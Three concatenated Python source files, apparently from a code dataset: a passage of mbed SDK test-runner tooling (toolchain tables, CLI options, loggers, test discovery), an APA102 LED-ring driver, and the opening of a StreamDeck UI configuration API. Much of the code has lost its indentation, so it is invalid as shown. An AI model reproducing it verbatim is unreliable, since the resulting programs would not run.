if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
            suffix = 's' if len(toolchain_conflicts[target]) > 1 else ''
            result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, suffix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
            # Filter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
            elif test[col] is None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
    step = int(percent_progress / 2)    # Scale percentage down to steps (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
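# Illustrative example: progress_bar(50.0) yields 25 '#' characters followed by 25 '.'
# characters; a non-zero saturation (e.g. 75) splices a '|' or '!' marker in at index saturation / 2.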
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
        # Export build results as a JUnit XML report to a separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
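    # Illustrative example: an 'Info' entry with log line "Building project" created at
    # 12:34:56 is rendered by log_print() as "[12:34:56] Info: Building project".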
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
        @param platform_name_filter Optional list of platform names used to filter the detected MUTs
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
        # For mcu_unique - we use the 'platform_name_unique' value from the mbedls output (if it exists);
        # if not, we create our own unique value (last few chars of the platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
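# Illustrative example result for a single detected board (hypothetical values, matching
# the mbed_lstools sample shown in the docstring above):
#   {1: {'mcu': 'NUCLEO_F302R8', 'mcu_unique': 'NUCLEO_F302R8[F72A]',
#        'port': 'COM34', 'disk': 'E:', 'peripherals': []}}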
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_option('', '--oper',
dest='operability_checks',
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
                      help='Test only board internals. Skip peripherals tests and perform common tests')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
                      help='Runs only tests enumerated in this switch. Use comma to separate test case names')
parser.add_option('-p', '--peripheral-by-names',
dest='peripheral_by_names',
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
                      help='Run Goanna static analysis tool for tests. (Project will be rebuilt)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
                      help='Run Goanna static analysis tool for mbed SDK (Project will be rebuilt)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
                      help='Suppresses display of well-formatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
                      help='Displays well-formatted table with test x toolchain test result per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
                      help='Experimental: executes test runners in parallel for MUTs connected to your host (speeds up test result collection)')
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
                      help='Displays full test specification and MUTs configuration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
                      help='Set global number of test loops per test. Default value is 1')
parser.add_option('', '--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall option. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
                      help='Set global name for all produced projects. Note, proper file extension will be added by build scripts')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option("", "--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
def test_path_to_name(path):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
    This can eventually be overridden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(path)
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir):
"""Given any directory, walk through the subdirectories and find all tests"""
def find_test_in_directory(directory, tests_path):
"""Given a 'TESTS' directory, return a dictionary of test names and test paths.
        The format of the dictionary is {"test-name": "./path/to/test"}"""
test = None
if tests_path in directory:
head, test_case_directory = os.path.split(directory)
if test_case_directory != tests_path and test_case_directory != "host_tests":
head, test_group_directory = os.path.split(head)
if test_group_directory != tests_path and test_case_directory != "host_tests":
test = {
"name": test_path_to_name(directory),
"path": directory
}
return test
tests_path = 'TESTS'
tests = {}
dirs = scan_for_source_paths(base_dir)
for directory in dirs:
test = find_test_in_directory(directory, tests_path)
if test:
tests[test['name']] = test['path']
return tests
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name]
print "Test Case:"
print " Name: %s" % test_name
print " Path: %s" % test_path
elif format == "json":
print json.dumps(tests, indent=2)
else:
print "Unknown format '%s'" % format
sys.exit(1)
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
options=None, clean=False, notify=None, verbose=False, jobs=1,
macros=None, silent=False, report=None, properties=None,
continue_on_build_fail=False):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
test_build = {
"platform": target.name,
"toolchain": toolchain_name,
"base_path": build_path,
"baud_rate": 9600,
"binary_type": "bootable",
"tests": {}
}
result = True
for test_name, test_path in tests.iteritems():
test_build_path = os.path.join(build_path, test_path)
src_path = base_source_paths + [test_path]
bin_file = None
try:
bin_file = build_project(src_path, test_build_path, target, toolchain_name,
options=options,
jobs=jobs,
clean=clean,
macros=macros,
name=test_name,
report=report,
properties=properties,
verbose=verbose)
except Exception, e:
if not isinstance(e, NotSupportedException):
result = False
if continue_on_build_fail:
continue
else:
break
# If a clean build was carried out last time, disable it for the next build.
# Otherwise the previously built test will be deleted.
if clean:
clean = False
# Normalize the path
if bin_file:
bin_file = os.path.normpath(bin_file)
test_build['tests'][test_name] = {
"binaries": [
{
"path": bin_file
}
]
}
print 'Image: %s'% bin_file
test_builds = {}
test_builds["%s-%s" % (target.name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
pixels.py
|
import apa102
import time
import threading
from gpiozero import LED
try:
import queue as Queue
except ImportError:
import Queue as Queue
from alexa_led_pattern import AlexaLedPattern
from google_home_led_pattern import GoogleHomeLedPattern
class Pixels:
PIXELS_N = 12
def __init__(self, pattern=AlexaLedPattern):
self.pattern = pattern(show=self.show)
self.dev = apa102.APA102(num_led=self.PIXELS_N)
self.power = LED(5)
self.power.on()
self.queue = Queue.Queue()
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
self.last_direction = None
def wakeup(self, direction=0):
self.last_direction = direction
def f():
self.pattern.wakeup(direction)
self.put(f)
def listen(self):
if self.last_direction:
def f():
self.pattern.wakeup(self.last_direction)
self.put(f)
else:
self.put(self.pattern.listen)
def think(self):
self.put(self.pattern.think)
def speak(self):
self.put(self.pattern.speak)
def off(self):
self.put(self.pattern.off)
def put(self, func):
self.pattern.stop = True
self.queue.put(func)
def _run(self):
while True:
func = self.queue.get()
self.pattern.stop = False
func()
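    # Note: show() expects a flat sequence with four values per pixel; the first value of
    # each group of four is ignored here and the remaining three are passed to the APA102
    # driver's set_pixel() as the red, green and blue components.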
def show(self, data):
for i in range(self.PIXELS_N):
self.dev.set_pixel(i, int(data[4*i + 1]), int(data[4*i + 2]), int(data[4*i + 3]))
self.dev.show()
pixels = Pixels()
if __name__ == '__main__':
while True:
try:
pixels.wakeup()
time.sleep(3)
pixels.think()
time.sleep(3)
pixels.speak()
time.sleep(6)
pixels.off()
time.sleep(3)
except KeyboardInterrupt:
break
pixels.off()
time.sleep(1)
|
api.py
|
"""Defines the Python API for interacting with the StreamDeck Configuration UI"""
import itertools
import json
import os
import threading
import time
from functools import partial
from io import BytesIO
from typing import Dict, Tuple, Union, cast
from warnings import warn
import cairosvg
from fractions import Fraction
from PIL import Image, ImageDraw, ImageFont, ImageSequence
from PySide2.QtCore import QObject, Signal
from StreamDeck import DeviceManager
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from StreamDeck.Transport.Transport import TransportError
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE, ICON_DIR
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
streamdecks_lock = threading.Lock()
key_event_lock = threading.Lock()
animation_buttons = dict()
class KeySignalEmitter(QObject):
key_pressed = Signal(str, int, bool)
streamdesk_keys = KeySignalEmitter()
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
""" Callback whenever a key is pressed. This is method runs the various actions defined
for the key being pressed, sequentially. """
# Stream Desk key events fire on a background thread. Emit a signal
# to bring it back to UI thread, so we can use Qt objects for timers etc.
    # Since multiple keys could fire simultaneously, we need to protect
# shared state with a lock
with key_event_lock:
streamdesk_keys.key_pressed.emit(deck_id, key, state)
def get_display_timeout(deck_id: str) -> int:
""" Returns the amount of time in seconds before the display gets dimmed."""
return cast(int, state.get(deck_id, {}).get("display_timeout", 0))
def set_display_timeout(deck_id: str, timeout: int) -> None:
""" Sets the amount of time in seconds before the display gets dimmed."""
state.setdefault(deck_id, {})["display_timeout"] = timeout
_save_state()
def _save_state():
export_config(STATE_FILE)
def _open_config(config_file: str):
global state
with open(config_file) as state_file:
config = json.loads(state_file.read())
file_version = config.get("streamdeck_ui_version", 0)
if file_version != CONFIG_FILE_VERSION:
raise ValueError(
"Incompatible version of config file found: "
f"{file_version} does not match required version "
f"{CONFIG_FILE_VERSION}."
)
state = {}
for deck_id, deck in config["state"].items():
deck["buttons"] = {
int(page_id): {int(button_id): button for button_id, button in buttons.items()}
for page_id, buttons in deck.get("buttons", {}).items()
}
state[deck_id] = deck
def import_config(config_file: str) -> None:
_open_config(config_file)
render()
_save_state()
def export_config(output_file: str) -> None:
try:
with open(output_file + ".tmp", "w") as state_file:
state_file.write(
json.dumps(
{"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
indent=4,
separators=(",", ": "),
)
)
except Exception as error:
print(f"The configuration file '{output_file}' was not updated. Error: {error}")
raise
else:
os.replace(output_file + ".tmp", os.path.realpath(output_file))
def export_icon(deck_id: str, page: int, button_id: int, icon_frames_to_save: list) -> None:
"""export rendered icon"""
if not os.path.isdir(ICON_DIR):
os.mkdir(ICON_DIR)
key = f"{deck_id}.{page}.{button_id}"
try:
gif = icon_frames_to_save
        if len(gif) > 1:
gif[0].save(
ICON_DIR + key + ".png",
save_all=True,
append_images=gif[1:],
optimize=False,
loop=0,
duration=40 # 40ms (25 fps)
)
else:
gif[0].save(ICON_DIR + key + ".png")
except Exception as error:
print(f"The icon file '{key}'.png was not updated. Error: {error}")
raise
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
"""Opens and then returns all known stream deck devices"""
for deck in DeviceManager.DeviceManager().enumerate():
deck.open()
deck.reset()
deck_id = deck.get_serial_number()
decks[deck_id] = deck
deck.set_key_callback(partial(_key_change_callback, deck_id))
return {
deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
for deck_id, deck in decks.items()
}
def close_decks() -> None:
"""Closes open decks for input/ouput."""
for _deck_serial, deck in decks.items():
if deck.connected():
deck.set_brightness(50)
deck.reset()
deck.close()
def ensure_decks_connected() -> None:
"""Reconnects to any decks that lost connection. If they did, re-renders them."""
for deck_serial, deck in decks.copy().items():
if not deck.connected():
for new_deck in DeviceManager.DeviceManager().enumerate():
try:
new_deck.open()
new_deck_serial = new_deck.get_serial_number()
except Exception as error:
warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
new_deck_serial = None
if new_deck_serial == deck_serial:
deck.close()
new_deck.reset()
new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
decks[new_deck_serial] = new_deck
render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
return {"type": decks[deck_id].deck_type(), "layout": decks[deck_id].key_layout()}
def _deck_state(deck_id: str) -> dict:
return state.setdefault(deck_id, {}) # type: ignore
def _page_state(deck_id: str, page: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
return buttons.setdefault(page, {}) # type: ignore
def _button_state(deck_id: str, page: int, button: int) -> dict:
buttons = state.setdefault(deck_id, {}).setdefault("buttons", {})
buttons_state = buttons.setdefault(page, {}) # type: ignore
return buttons_state.setdefault(button, {}) # type: ignore
def swap_buttons(deck_id: str, page: int, source_button: int, target_button: int) -> None:
"""Swaps the properties of the source and target buttons"""
temp = cast(dict, state[deck_id]["buttons"])[page][source_button]
cast(dict, state[deck_id]["buttons"])[page][source_button] = cast(
dict, state[deck_id]["buttons"]
)[page][target_button]
cast(dict, state[deck_id]["buttons"])[page][target_button] = temp
# Clear the cache so images will be recreated on render
image_cache.pop(f"{deck_id}.{page}.{source_button}", None)
image_cache.pop(f"{deck_id}.{page}.{target_button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{source_button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{source_button}" + ".png")
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{target_button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{target_button}" + ".png")
_save_state()
render()
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
"""Set the text associated with a button"""
if get_button_text(deck_id, page, button) != text:
_button_state(deck_id, page, button)["text"] = text
image_cache.pop(f"{deck_id}.{page}.{button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png")
render()
if not bool(text):
del_none_key(deck_id, page, button, "text")
_save_state()
def get_button_text(deck_id: str, page: int, button: int) -> str:
"""Returns the text set for the specified button"""
return _button_state(deck_id, page, button).get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
"""Sets the icon associated with a button"""
if get_button_icon(deck_id, page, button) != icon:
_button_state(deck_id, page, button)["icon"] = icon
image_cache.pop(f"{deck_id}.{page}.{button}", None)
if os.path.isfile(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png"):
os.remove(ICON_DIR + f"{deck_id}.{page}.{button}" + ".png")
render()
if not bool(icon):
del_none_key(deck_id, page, button, "icon")
_save_state()
def get_button_icon(deck_id: str, page: int, button: int) -> str:
"""Returns the icon set for a particular button"""
return _button_state(deck_id, page, button).get("icon", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
"""Sets the brightness changing associated with a button"""
if get_button_change_brightness(deck_id, page, button) != amount:
_button_state(deck_id, page, button)["brightness_change"] = amount
render()
if amount == 0:
del_none_key(deck_id, page, button, "brightness_change")
_save_state()
def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
"""Returns the brightness change set for a particular button"""
return _button_state(deck_id, page, button).get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
"""Sets the command associated with the button"""
if get_button_command(deck_id, page, button) != command:
if bool(command):
_button_state(deck_id, page, button)["command"] = command
else:
del_none_key(deck_id, page, button, "command")
_save_state()
def get_button_command(deck_id: str, page: int, button: int) -> str:
"""Returns the command set for the specified button"""
